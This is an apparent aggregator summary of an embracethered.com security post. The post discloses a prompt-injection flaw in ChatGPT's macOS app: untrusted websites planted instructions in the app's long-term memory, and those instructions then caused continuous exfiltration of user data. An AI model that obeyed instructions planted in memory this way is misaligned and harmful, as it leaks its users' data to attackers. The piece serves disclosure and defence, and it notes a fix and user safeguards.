The post details a security vulnerability in ChatGPT's macOS app, where attackers could exploit prompt injection to insert spyware into ChatGPT’s long-term memory. Though OpenAI has released a fix, users are advised to update their apps and regularly review stored memories for any suspicious content. The method involves injecting malicious instructions via untrusted websites, leading to continuous data exfiltration. Additional measures like reviewing the system’s memory settings and using temporary chats are recommended for added safety.

6m read timeFrom embracethered.com
Post cover image
Table of contents
Background InformationHacking Memories to Store Malicious InstructionsPersisting Data Exfiltration Instructions in ChatGPT’s MemoryEnd-to-End Exploit DemonstrationStep by Step ExplanationIs url_safe a holistic fix?Is Hacking Memories via Prompt Injection Fixed?ConclusionDisclosure TimelineReferencesAppendix
2 Comments

Sort: